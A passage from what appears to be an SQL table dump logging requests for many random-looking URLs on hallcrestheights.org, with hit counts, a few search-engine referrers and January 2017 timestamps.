00:00:00'),(4167,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup-i20162632-hvqa-wuoxz-mnpzvs-gcrl-k16220-ycmczoqq-eludpwcm-egiapx-mxikii.htm',NULL,'','',1,0,'2017-01-10 05:13:52','0000-00-00 00:00:00'),(4168,'http://www.hallcrestheights.org/soeg-i20162629-szxyife-tvtndyu-uhvfc-yzlsx-k26705-xqroxae-hksk-xyxembuq-udtwq-ceyvuc-iwqws-gfrvrjo/',NULL,'','',1,0,'2017-01-10 05:14:20','0000-00-00 00:00:00'),(4169,'http://www.hallcrestheights.org/kzpf-i20162629-fmsxklr/dedhwge-k7955-fvbbg/',NULL,'','',1,0,'2017-01-10 05:22:43','0000-00-00 00:00:00'),(4170,'http://www.hallcrestheights.org/oiyizg-k29089-olrcmwfb-snop-dgfnh-i20162632-skrl-jrgfctf-zfiwxwm-akoay-osmpql/',NULL,'','',2,0,'2017-01-10 05:28:13','0000-00-00 00:00:00'),(4171,'http://www.hallcrestheights.org/cwhriw-i20162629-k35549-gpekzqdw-kvum-zbsai/',NULL,'','',1,0,'2017-01-10 05:28:42','0000-00-00 00:00:00'),(4172,'http://www.hallcrestheights.org/oiyizg-k36499-olrcmwfb-snop/dgfnh-i20162629-skrl-jrgfctf-zfiwxwm/',NULL,'','',1,0,'2017-01-10 05:29:19','0000-00-00 00:00:00'),(4173,'http://www.hallcrestheights.org/yembjv-htqqdckz/fltz-terqb-i20162632-wnsw-k29039-nsnjplp/',NULL,'','',1,0,'2017-01-10 05:30:24','0000-00-00 00:00:00'),(4174,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-i20162633-pzqjllzo-k28464-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz-hribnkn.htm',NULL,'','',1,0,'2017-01-10 05:31:40','0000-00-00 00:00:00'),(4175,'http://www.hallcrestheights.org/lugdl-i20162636-trsm/xxhy-pzqjllzo-k22354-hnjumnte.htm',NULL,'','',1,0,'2017-01-10 05:33:42','0000-00-00 00:00:00'),(4176,'http://www.hallcrestheights.org/k37500-pcscqruf-unpkw-xpoideot-wtvsoar-i20162634-mosm-gepla-lheliy-rqiy-qfufxvug-owopegtq.htm',NULL,'','',1,0,'2017-01-10 05:34:38','0000-00-00 00:00:00'),(4177,'http://www.hallcrestheights.org/kzpffmsx-klrd/edhwgef-vbbgzagp-eciyyuwu-i20162633-k40091-vfzt/',NULL,'','',1,0,'2017-01-10 05:34:48','0000-00-00 00:00:00'),(4178,'http://www.hallcrestheights.org/k58200-jgletkym-drqzn-rvmlkswa-zvkecqq-i20162634-neei-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp.htm',NULL,'','',3,0,'2017-01-10 05:37:36','0000-00-00 00:00:00'),(4179,'http://www.hallcrestheights.org/k56580-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-i20162636-jltfeo-bkeb-wivsmqkr-fbmlkmst.htm',NULL,'','',1,0,'2017-01-10 05:40:34','0000-00-00 00:00:00'),(4180,'http://www.hallcrestheights.org/i20162630-k6145-wbwp-bonkydh-xjjikvf-vtzpx-bxkcw/',NULL,'','',1,0,'2017-01-10 05:43:33','0000-00-00 00:00:00'),(4181,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-mcawvbfu-japyvrlf-lxhqjk-k7464-uhkcm-i20162633-umbhmg-znkoh-eyrupxp-udzikmu.htm',NULL,'','',1,0,'2017-01-10 05:46:30','0000-00-00 00:00:00'),(4182,'http://www.hallcrestheights.org/uptt-mnbeatg-k48442-rbnqc/i20162628-dcncxr-dhcpgzz-dllimvyx-jltfeob.htm',NULL,'','',1,0,'2017-01-10 05:47:56','0000-00-00 00:00:00'),(4183,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-abtnwyrq-k28164-semgwkow-hmemxg-kucyb-i20162633-npzkic-vejxk-ulzjcjk-ntsxjln.htm',NULL,'','',1,0,'2017-01-10 05:49:28','0000-00-00 00:00:00'),(4184,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-k35580-nplqfc-nebx-ilnvoxbd-jveebikp-i20162636-tjvlxf.htm',NULL,'','',1,0,'2017-01-10 05:52:30','0000-00-00 00:00:00'),(4185,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-abtnwyrq-semgwkow-i20162633-hmemxg-kucyb-npzkic-k7364-vejxk-ulzjcjk-ntsxjln-uuuv.htm',NULL,'','',1,0,'2017-01-10 05:55:24','0000-00-00 00:00:00'),(4186,'http://www.hallcrestheights.org/k5605-xhaj-vqlwczb-iqsosqx-oqkgq-i20162629-aqydc/',NULL,'','',1,0,'2017-01-10 06:01:22','0000-00-00 00:00:00'),(4187,'http://www.hallcrestheights.org/i20162635-wbwpb-onkydh-k22057-xjjik-vfvt-zpxbxkc/',NULL,'','',2,0,'2017-01-10 06:04:18','0000-00-00 00:00:00'),(4188,'http://www.hallcrestheights.org/k6505-bsoa-pazapst-asgmhcq-cmckf-i20162629-rdtfk/',NULL,'','',1,0,'2017-01-10 06:07:17','0000-00-00 00:00:00'),(4189,'http://www.hallcrestheights.org/qlbowc-iggeceay-i20162632-afxr-glnik-k50389-ghhm/',NULL,'','',1,0,'2017-01-10 06:10:14','0000-00-00 00:00:00'),(4190,'http://www.hallcrestheights.org/k9205-qlbo-wciggec-eayafxr-glnik-i20162629-ghhmb/',NULL,'','',1,0,'2017-01-10 06:13:12','0000-00-00 00:00:00'),(4191,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-i20162632-kvum-zbsai-k28789-imjz/',NULL,'','',1,0,'2017-01-10 06:16:11','0000-00-00 00:00:00'),(4192,'http://www.hallcrestheights.org/k8305-htxw-hykrsvs-vhudykb-qxdos-i20162629-fiety/',NULL,'','',1,0,'2017-01-10 06:19:11','0000-00-00 00:00:00'),(4193,'http://www.hallcrestheights.org/k26305-nfrk-opdobbu-mgolzes-rkwtz-i20162629-qtqbs/',NULL,'','',1,0,'2017-01-10 06:22:06','0000-00-00 00:00:00'),(4194,'http://www.hallcrestheights.org/ajqxxucu-zaof-ifephii-jimjnjbo-gtsakbcc-gyfm-i20162632-k59241-dvju-xzlek-tsls-hxosqqj-vfyoih/',NULL,'','',1,0,'2017-01-10 06:28:02','0000-00-00 00:00:00'),(4195,'http://www.hallcrestheights.org/nfrkopdo-bbum-golzesr-kwtzqtqb-i20162630-svjcwjbx-k58701-nmyv-sssl-djzna-ahjb-kwxrosh-olvgwx/',NULL,'','',1,0,'2017-01-10 06:39:54','0000-00-00 00:00:00'),(4196,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv-bbgzagp-eciyyuwu-vfztjigj-inamzbc-ngtfmlyr-i20162635-k21657-ghdfi-pwgd/',NULL,'','',1,0,'2017-01-10 06:51:46','0000-00-00 00:00:00'),(4197,'http://www.hallcrestheights.org/kzpf-i20162629-fmsxklr-dedhwge-fvbbg-zagpe-k6005-ciyyuwu-vfzt-jigjinam-zbcng-tfmlyr-ghdfi-pwgdqrk/',NULL,'','',1,0,'2017-01-10 06:54:44','0000-00-00 00:00:00'),(4198,'http://www.hallcrestheights.org/ajqxxuc-uzaof-ifephi-i20162631-ijimjn-jbogt-k7553-sakb-ccgyfm-dvjuxz-lektsls-hxosq-qjvfy-oihttjpu/',NULL,'','',1,0,'2017-01-10 06:57:42','0000-00-00 00:00:00'),(4199,'http://www.hallcrestheights.org/i20162632-cwhriw-gpekzqdw-kvum/zbsai-imjz-fozgdvd-dqjvdob-k29439-knlyk/',NULL,'','',2,0,'2017-01-10 07:01:35','0000-00-00 00:00:00'),(4200,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-k10299-uhvfc/yzls-xxqroxa-ehkskxy-xembu-qudtwq-ceyv-i20162636-uciwqwsg/',NULL,'','',1,0,'2017-01-10 07:02:36','0000-00-00 00:00:00'),(4201,'http://www.hallcrestheights.org/oiyi-i20162629-zgolrcm-wfbsnop-dgfnh-skrlj-k8705-rgfctfz-fiwx-wmakoayo-smpql-gvegdf-vgcrc-bzmqnod/',NULL,'','',1,0,'2017-01-10 07:03:38','0000-00-00 00:00:00'),(4202,'http://www.hallcrestheights.org/lugdltrs-mxxhy-k59690-pzqjllzo-hnjumnt/ecwf-ogywb-iwyrur-fgvf-cwqzhrib-i20162637-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-10 07:03:42','0000-00-00 00:00:00'),(4203,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-i20162631-uhvfcy-zlsxx-k8453-qrox-aehksk-xyxemb-uqudtwq-ceyvu-ciwqw-sgfrvrjo/',NULL,'','',1,0,'2017-01-10 07:09:34','0000-00-00 00:00:00'),(4204,'http://www.hallcrestheights.org/wbwp-i20162629-bonkydh-xjjikvf-vtzpx-bxkcw-k28505-jybtylw-osdu-ieqgwsog-xhgpi-sdhtni-rmjhv-zyxodbx/',NULL,'','',1,0,'2017-01-10 07:12:32','0000-00-00 00:00:00'),(4205,'http://www.hallcrestheights.org/cwhriwg-pekzq-i20162630-dwkvum-zbsaii-mjzfo-k24473-zgdv-ddqjvd-obknly-kconedw-jmaxe-vortb-zqsaxidi/',NULL,'','',1,0,'2017-01-10 07:15:30','0000-00-00 00:00:00'),(4206,'http://www.hallcrestheights.org/ajqx-i20162629-xucuzao-fifephi-ijimj-njbog-k49205-tsakbcc-gyfm-dvjuxzle-ktsls-hxosqq-jvfyo-ihttjpu/',NULL,'','',1,0,'2017-01-10 07:18:28','0000-00-00 00:00:00'),(4207,'http://www.hallcrestheights.org/kzpffms-xklrd-i20162630-edhwge-fvbbgz-agpec-k57953-iyyu-wuvfzt-jigjin-amzbcng-tfmly-rghdf-ipwgdqrk/',NULL,'','',1,0,'2017-01-10 07:21:30','0000-00-00 00:00:00'),(4208,'http://www.hallcrestheights.org/nfrkopdo-bbum-i20162630-golzesr-kwtzqtqb-svjcwjbx-k37901-nmyv-sssl-djzna-ahjb-kwxrosh-olvgwx-kwoih/',NULL,'','',1,0,'2017-01-10 07:24:24','0000-00-00 00:00:00'),(4209,'http://www.hallcrestheights.org/tkuy-k28305-kfjdnjj-bucyupa-jaylr-lwfvd-i20162629-yruqpkl-sdef-hxdfpdfu/',NULL,'','',2,0,'2017-01-10 07:24:56','0000-00-00 00:00:00'),(4210,'http://www.hallcrestheights.org/tkuykfjd-njjb-ucyupaj-aylrlwfv-i20162632-dyruqpkl-k59141-sdef-hxdf-pdfuf-pfaj-npvzatt-uxdwvp-eekly/',NULL,'','',1,0,'2017-01-10 07:30:21','0000-00-00 00:00:00'),(4211,'http://www.hallcrestheights.org/yembjvht-qqdc-i20162630-kzfltzt-erqbwnsw-nsnjplpf-k58601-trrj-ncyp-joqwg-zjev-ihsdpac-aylhya-yzeue/',NULL,'','',1,0,'2017-01-10 07:36:16','0000-00-00 00:00:00'),(4212,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz-qdwkvum-zbsai-imjzf-k47405-ozgdvdd-qjvd-obknlykc-onedw-jmaxev-ortbz-qsaxidi/',NULL,'','',1,0,'2017-01-10 07:39:14','0000-00-00 00:00:00'),(4213,'http://www.hallcrestheights.org/tkuy-i20162629-kfjdnjj-bucyupa-jaylr-lwfvd-k48845-yruqpkl-sdef-hxdfpdfu-fpfaj-npvzat-tuxdw-vpeekly/',NULL,'','',1,0,'2017-01-10 07:42:12','0000-00-00 00:00:00'),(4214,'http://www.hallcrestheights.org/cwhriwgp-ekzq-dwkvumz-bsaiimjz-i20162632-fozgdvdd-k60041-qjvd-obkn-lykco-nedw-jmaxevo-rtbzqs-axidi/',NULL,'','',1,0,'2017-01-10 07:45:10','0000-00-00 00:00:00'),(4215,'http://www.hallcrestheights.org/ajqxxucu-zaof-ifephii-jimjnjbo-gtsakbcc-i20162633-k38441-gyfm-dvju-xzlek-tsls-hxosqqj-vfyoih-ttjpu/',NULL,'','',1,0,'2017-01-10 07:51:08','0000-00-00 00:00:00'),(4216,'http://www.hallcrestheights.org/soegszxy-ifet-vtndyuu-hvfcyzls-xxqroxae-i20162633-k39341-hksk-xyxe-mbuqu-dtwq-ceyvuci-wqwsgf-rvrjo/',NULL,'','',1,0,'2017-01-10 07:54:04','0000-00-00 00:00:00'),(4217,'http://www.hallcrestheights.org/bsoapaz-apsta-i20162630-sgmhcq-cmckfr-dtfkg-k36353-pvbc-hsiwho-rklvzr-tjrsyoa-ayfwg-dxskm-yukcmbqr/',NULL,'','',1,0,'2017-01-10 07:57:02','0000-00-00 00:00:00'),(4218,'http://www.hallcrestheights.org/wbwpbonk-ydhx-jjikvfv-tzpxbxkc-wjybtylw-i20162633-k17741-osdu-ieqg-wsogx-hgpi-sdhtnir-mjhvzy-xodbx/',NULL,'','',1,0,'2017-01-10 08:00:04','0000-00-00 00:00:00'),(4219,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj-njbo-i20162633-k8489-gtsakbc-cgyfmdv-juxzl-ektsls-hxos-qqjvfyoi-httjputl/',NULL,'','',1,0,'2017-01-10 08:05:57','0000-00-00 00:00:00'),(4220,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv-bbgzagp-k857-eciyyuwu-vfztjigj-i20162635-inamzbc-ngtfmlyr-ghdfi-pwgd-qrkbhd/',NULL,'','',1,0,'2017-01-10 08:08:54','0000-00-00 00:00:00'),(4221,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-jaylr-i20162632-lwfv-k29189-dyruqpk-lsdefhx-dfpdf-ufpfaj-npvz-attuxdwv-peeklyzx/',NULL,'','',1,0,'2017-01-10 08:14:51','0000-00-00 00:00:00'),(4222,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-yuuh-vfcyzls-k21557-xxqroxae-hkskxyxe-i20162635-mbuqudt-wqceyvuc-iwqws-gfrv-rjodsu/',NULL,'','',1,0,'2017-01-10 08:17:48','0000-00-00 00:00:00'),(4223,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-hiij-imjnjbo-gtsakbcc-gyfmdvju-xzlekts-k25077-lshxosqq-i20162635-jvfyo-ihtt/',NULL,'','',1,0,'2017-01-10 08:23:29','0000-00-00 00:00:00'),(4224,'http://www.hallcrestheights.org/bsoap-k10457-azapst-asgmh-i20162635-cqcm/',NULL,'','',1,0,'2017-01-10 08:23:44','0000-00-00 00:00:00'),(4225,'http://www.hallcrestheights.org/soegs-k52757-zxyife-i20162634-tvtnd-yuuh/',NULL,'','',1,0,'2017-01-10 08:26:42','0000-00-00 00:00:00'),(4226,'http://www.hallcrestheights.org/i20162635-kzpff-msxklr-k11257-dedhw-gefv-bbgzagp/',NULL,'','',1,0,'2017-01-10 08:35:36','0000-00-00 00:00:00'),(4227,'http://www.hallcrestheights.org/cwhri-wgpekz-k52657-qdwkv-umzb-i20162634-saiimjz/',NULL,'','',1,0,'2017-01-10 08:38:35','0000-00-00 00:00:00'),(4228,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf-vtzpx-bxkcw-k6405-jybtylw-osdu-ieqgwsog-xhgpi-i20162629-sdhtni/',NULL,'','',1,0,'2017-01-10 08:41:10','0000-00-00 00:00:00'),(4229,'http://www.hallcrestheights.org/cwhri-i20162635-wgpekz-qdwkv-umzb-saiimjz-k11057-fozgdvdd/',NULL,'','',1,0,'2017-01-10 08:41:35','0000-00-00 00:00:00'),(4230,'http://www.hallcrestheights.org/i20162634-xhajv-qlwczb-iqsos-qxoq-kgqaqyd-k52457-cptznzvt/',NULL,'','',2,0,'2017-01-10 08:44:30','0000-00-00 00:00:00'),(4231,'http://www.hallcrestheights.org/oiyi-zgolrcm-wfbsnop-dgfnh-skrlj-i20162629-k49005-rgfctfz-fiwx-wmakoayo/',NULL,'','',1,0,'2017-01-10 08:46:16','0000-00-00 00:00:00'),(4232,'http://www.hallcrestheights.org/nfrko-pdobbu-i20162634-mgolz-esrk-k52357-wtzqtqb-svjcwjbx-nmyvsssl/',NULL,'','',1,0,'2017-01-10 08:47:28','0000-00-00 00:00:00'),(4233,'http://www.hallcrestheights.org/htxwh-ykrsvs-k10957-vhudy-i20162635-kbqx-dosfiet-yuaixnrb-dggsaarh/',NULL,'','',1,0,'2017-01-10 08:53:24','0000-00-00 00:00:00'),(4234,'http://www.hallcrestheights.org/kzpff-k52857-msxklr-i20162634-dedhw-gefv-bbgzagp-eciyyuwu-vfztjigj-inamzbc/',NULL,'','',1,0,'2017-01-10 08:56:22','0000-00-00 00:00:00'),(4235,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-i20162635-xrgl-nikghhm-k10557-bbxpgesm-rcaiztbi-auwdtvi/',NULL,'','',1,0,'2017-01-10 08:59:20','0000-00-00 00:00:00'),(4236,'http://www.hallcrestheights.org/k60990-lugdltrs-mxxhy-pzqjllzo-hnjumnt/ecwf-ogywb-iwyrur-i20162637-fgvf-cwqzhrib-nknyfeeb.htm',NULL,'','',1,0,'2017-01-10 09:01:39','0000-00-00 00:00:00'),(4237,'http://www.hallcrestheights.org/oiyiz-k52957-golrcm-wfbsn-opdg-fnhskrl-jrgfctfz-i20162634-fiwxwmak-oayosmp-qlgvegdf/',NULL,'','',1,0,'2017-01-10 09:02:18','0000-00-00 00:00:00'),(4238,'http://www.hallcrestheights.org/yembj-k10657-vhtqqd-ckzfl-tzte-rqbwnsw-nsnjplpf-trrjncyp-i20162635-joqwgzj-evihsdpa/',NULL,'','',1,0,'2017-01-10 09:05:16','0000-00-00 00:00:00'),(4239,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx-i20162634-dosfiet-yuaixnrb-dggsaarh-k52557-efskjyd-mrujwimj-qiaau/',NULL,'','',1,0,'2017-01-10 09:08:14','0000-00-00 00:00:00'),(4240,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-yuuh-vfcyzls-i20162635-xxqroxae-hkskxyxe-k11157-mbuqudt-wqceyvuc-iwqws/',NULL,'','',1,0,'2017-01-10 09:11:12','0000-00-00 00:00:00'),(4241,'http://www.hallcrestheights.org/k10857-xhajv-qlwczb-iqsos-qxoq-kgqaqyd-cptznzvt-jqoevpca-qwjaluw-tybckbsx-i20162635-bnbgn-ndor/',NULL,'','',1,0,'2017-01-10 09:14:10','0000-00-00 00:00:00'),(4242,'http://www.hallcrestheights.org/yembj-vhtqqd-ckzfl-tzte-rqbwnsw-nsnjplpf-trrjncyp-k52257-joqwgzj-i20162634-evihsdpa-caylh-yayz/',NULL,'','',1,0,'2017-01-10 09:17:09','0000-00-00 00:00:00'),(4243,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-xrgl-nikghhm-k52157-bbxpgesm-i20162634-rcaiztbi-auwdtvi-xpmtzhzz-wzrqr-dcfp-smfwaz/',NULL,'','',1,0,'2017-01-10 09:20:06','0000-00-00 00:00:00'),(4244,'http://www.hallcrestheights.org/nfrko-pdobbu-mgolz-esrk-wtzqtqb-k10757-svjcwjbx-nmyvsssl-i20162635-djznaah-jbkwxros-holvg-wxkw-oihomw/',NULL,'','',1,0,'2017-01-10 09:26:02','0000-00-00 00:00:00'),(4245,'http://www.hallcrestheights.org/qlbo-i20162629-wciggec-eayafxr-glnik-ghhmb-k49505-bxpgesm/',NULL,'','',1,0,'2017-01-10 09:27:13','0000-00-00 00:00:00'),(4246,'http://www.hallcrestheights.org/edzv-dlqcomn/k47842-nmmca-i20162628-wvbfuj-apyvrlf.htm',NULL,'','',1,0,'2017-01-10 10:02:38','0000-00-00 00:00:00'),(4247,'http://www.hallcrestheights.org/k36330-pcscqruf-unpkw-xpoideot-wtvsoar/mosm-gepla-i20162636-lheliy-rqiy-qfufxvug-owopegtq.htm',NULL,'','',1,0,'2017-01-10 10:34:07','0000-00-00 00:00:00'),(4248,'http://www.hallcrestheights.org/soegsz-k35649-xyifetvt-ndyu-uhvfc-yzls-i20162629-xxqroxa-ehkskxy-xembu/',NULL,'','',1,0,'2017-01-10 10:49:27','0000-00-00 00:00:00'),(4249,'http://www.hallcrestheights.org/bsoa-i20162629-pazapst/asgmhcq-cmckf-rdtfk-k5855-gpvbchs/',NULL,'','',1,0,'2017-01-10 10:55:50','0000-00-00 00:00:00'),(4250,'http://www.hallcrestheights.org/k6200-jgletkym-drqzn-rvmlkswa-i20162635-zvkecqq.htm',NULL,'https://www.google.co.jp/','',8,0,'2017-01-10 11:03:06','0000-00-00 00:00:00'),(4251,'http://www.hallcrestheights.org/i20162632-k4220-pcscqruf-unpkw-xpoideot-wtvsoar.htm',NULL,'http://search.yahoo.co.jp/','',14,0,'2017-01-10 13:41:53','0000-00-00 00:00:00'),(4252,'http://www.hallcrestheights.org/k27764-dvisc-i20162633-iwbv-wkux-krbzomsm.htm',NULL,'','',1,0,'2017-01-10 14:09:53','0000-00-00 00:00:00'),(4253,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-oqkgq-i20162632-aqyd-k28589-cptznzv/',NULL,'','',1,0,'2017-01-10 14:27:53','0000-00-00 00:00:00'),(4254,'http://www.hallcrestheights.org/zmkuedtz-jivyo-i20162636-k14180-qxifgxuh-xptvuhm-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-10 14:34:16','0000-00-00 00:00:00'),(4255,'http://www.hallcrestheights.org/i20162630-soegszxy-k59101-ifet-vtndyuu-hvfcyzls-xxqroxae/',NULL,'','',1,0,'2017-01-10 14:35:48','0000-00-00 00:00:00'),(4256,'http://www.hallcrestheights.org/vqjny-i20162633-k8464-spvh-oljp-eurrtpil-uourxivl-btrhnn-mtqzk.htm',NULL,'','',1,0,'2017-01-10 14:38:55','0000-00-00 00:00:00'),(4257,'http://www.hallcrestheights.org/gnfzn-i20162633-xvjx-k29164-palt-itjshkyj-yldpijaa-mdurta-enpgg.htm',NULL,'','',1,0,'2017-01-10 14:45:33','0000-00-00 00:00:00'),(4258,'http://www.hallcrestheights.org/nfrk-i20162629-opdobbu-mgolzes-rkwtz-qtqbs-k8105-vjcwjbx/',NULL,'','',1,0,'2017-01-10 14:49:08','0000-00-00 00:00:00'),(4259,'http://hallcrestheights.org//xx.html',NULL,'','',1,0,'2017-01-10 14:49:55','0000-00-00 00:00:00'),(4260,'http://www.hallcrestheights.org/cwhr-iwgpekz-i20162630-qdwkvum-zbsai-imjzf-k6845-ozgdvdd/',NULL,'','',1,0,'2017-01-10 14:59:50','0000-00-00 00:00:00'),(4261,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-i20162636-k34780-amdu-rtaen-pggwtd.htm',NULL,'','',1,0,'2017-01-10 15:06:11','0000-00-00 00:00:00'),(4262,'http://www.hallcrestheights.org/yembjvht-k59641-qqdc-i20162632-kzfltzt-erqbwnsw-nsnjplpf/',NULL,'','',1,0,'2017-01-10 15:07:20','0000-00-00 00:00:00'),(4263,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-k14080-uourxiv-i20162636-lbtr-hnnmt-qzkowt.htm',NULL,'','',1,0,'2017-01-10 15:11:39','0000-00-00 00:00:00'),(4264,'http://www.hallcrestheights.org/wbwp-i20162629-bonkydh-xjjikvf-vtzpx-bxkcw-k9005-jybtylw/',NULL,'','',1,0,'2017-01-10 15:14:35','0000-00-00 00:00:00'),(4265,'http://www.hallcrestheights.org/k8064-upttm-i20162633-nbea-tgrb-nqcdcncx-rdhcpgzz-dllimv-yxjlt-feobke.htm',NULL,'','',1,0,'2017-01-10 15:21:36','0000-00-00 00:00:00'),(4266,'http://www.hallcrestheights.org/k29664-ixnmu-i20162633-eahw-hioz-hjxbnwpg-eyooayik-uksszq-cebaq-domytn.htm',NULL,'','',1,0,'2017-01-10 15:25:08','0000-00-00 00:00:00'),(4267,'http://www.hallcrestheights.org/ajqx-i20162629-xucuzao-fifephi-ijimj-njbog-k6305-tsakbcc/',NULL,'','',1,0,'2017-01-10 15:28:47','0000-00-00 00:00:00'),(4268,'http://www.hallcrestheights.org/wbwpbonk-k39841-ydhx-jjikvfv-i20162633-tzpxbxkc-wjybtylw/',NULL,'','',2,0,'2017-01-10 15:55:49','0000-00-00 00:00:00'),(4269,'http://www.hallcrestheights.org/k13680-upttmnbe-atgrb-nqcdcncx-rdhcpgz-i20162636-zdll-imvyx-jltfeo-bkeb.htm',NULL,'','',1,0,'2017-01-10 16:01:57','0000-00-00 00:00:00'),(4270,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar-i20162636-k34380-mosm-gepla-lheliy-rqiy.htm',NULL,'','',1,0,'2017-01-10 16:04:04','0000-00-00 00:00:00'),(4271,'http://www.hallcrestheights.org/i20162630-wbwpbonk-k37501-ydhx-jjikvfv-tzpxbxkc-wjybtylw/',NULL,'','',1,0,'2017-01-10 16:06:03','0000-00-00 00:00:00'),(4272,'http://www.hallcrestheights.org/fadla-k8164-jfnl-gfpc-vwgmyhde-cwxbdeud-i20162633-kovfii-bptqu-hzxchh-rmxag.htm',NULL,'','',1,0,'2017-01-10 16:09:05','0000-00-00 00:00:00'),(4273,'http://www.hallcrestheights.org/upttm-k28864-nbea-tgrb-nqcdcncx-rdhcpgzz-i20162633-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',1,0,'2017-01-10 16:10:52','0000-00-00 00:00:00'),(4274,'http://www.hallcrestheights.org/upttmnbe-k34480-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-i20162636-wivsmqkr.htm',NULL,'','',1,0,'2017-01-10 16:12:44','0000-00-00 00:00:00'),(4275,'http://www.hallcrestheights.org/fadlajfn-k13780-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-i20162636-mxagfpap.htm',NULL,'','',1,0,'2017-01-10 16:15:42','0000-00-00 00:00:00'),(4276,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-i20162633-abtnwyrq-k8664-semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk.htm',NULL,'','',1,0,'2017-01-10 16:17:25','0000-00-00 00:00:00'),(4277,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-i20162633-qxifgxuh-k29364-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-kzonmtl.htm',NULL,'','',1,0,'2017-01-10 16:17:48','0000-00-00 00:00:00'),(4278,'http://www.hallcrestheights.org/nfrkopdo-k38941-bbum-golzesr-i20162633-kwtzqtqb-svjcwjbx/',NULL,'','',1,0,'2017-01-10 16:20:08','0000-00-00 00:00:00'),(4279,'http://www.hallcrestheights.org/k34980-zmkuedtz-jivyo-qxifgxuh-xptvuhm-iwnz-korpv-i20162636-ubfgnq-tpmh-prbikzon-mtlajhol.htm',NULL,'','',1,0,'2017-01-10 16:24:46','0000-00-00 00:00:00'),(4280,'http://www.hallcrestheights.org/wbwpbo-i20162629-nkydhxjj-ikvf-vtzpx-bxkc-k36149-wjybtyl/',NULL,'','',1,0,'2017-01-10 16:37:38','0000-00-00 00:00:00'),(4281,'http://www.hallcrestheights.org/k14280-mrcqgbei-fuwgr-abtnwyrq-semgwko-whme-mxgku-i20162636-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-10 16:38:57','0000-00-00 00:00:00'),(4282,'http://www.hallcrestheights.org/k13380-ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj-dyhao-i20162636-xrcjhw-uvds-vezytwlc-ycwscpua.htm',NULL,'','',1,0,'2017-01-10 16:39:49','0000-00-00 00:00:00'),(4283,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj-k8364-yldpijaa-mdurta-enpgg-i20162633-wtdvlx-tdqku-nfglqrh-zyonxfe.htm',NULL,'','',1,0,'2017-01-10 16:46:45','0000-00-00 00:00:00'),(4284,'http://www.hallcrestheights.org/i20162630-kzpffmsx-k38401-klrd-edhwgef-vbbgzagp-eciyyuwu/',NULL,'','',1,0,'2017-01-10 16:51:09','0000-00-00 00:00:00'),(4285,'http://www.hallcrestheights.org/dvisc-iwbv-k29064-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-i20162633-zvsgcr-lycmc-zoqqelu-dpwcmeg.htm',NULL,'','',1,0,'2017-01-10 16:52:56','0000-00-00 00:00:00'),(4286,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-pggwtd-vlxt-dqkunfgl-qrhzyonx-i20162636-k13980-feqnzs.htm',NULL,'','',1,0,'2017-01-10 16:55:42','0000-00-00 00:00:00'),(4287,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-vuclzuph-i20162633-vqawuo-xzmnp-zvsgcr-k8264-lycmc-zoqqelu-dpwcmeg-iapx.htm',NULL,'','',1,0,'2017-01-10 16:56:57','0000-00-00 00:00:00'),(4288,'http://www.hallcrestheights.org/bsoapaza-k19141-psta-sgmhcqc-i20162633-mckfrdtf-kgpvbchs/',NULL,'','',1,0,'2017-01-10 16:58:34','0000-00-00 00:00:00'),(4289,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-k34680-ycmczoqq-eludpwcm-i20162636-egiapx.htm',NULL,'','',1,0,'2017-01-10 17:05:46','0000-00-00 00:00:00'),(4290,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-cwxbdeud-i20162633-kovfii-bptqu-hzxchh-k28964-rmxag-fpapuhg-fqvjdcl-bbvz.htm',NULL,'','',1,0,'2017-01-10 17:13:28','0000-00-00 00:00:00'),(4291,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-i20162636-k13880-ycmczoqq-eludpwcm-egiapx-mxikii.htm',NULL,'','',1,0,'2017-01-10 17:23:40','0000-00-00 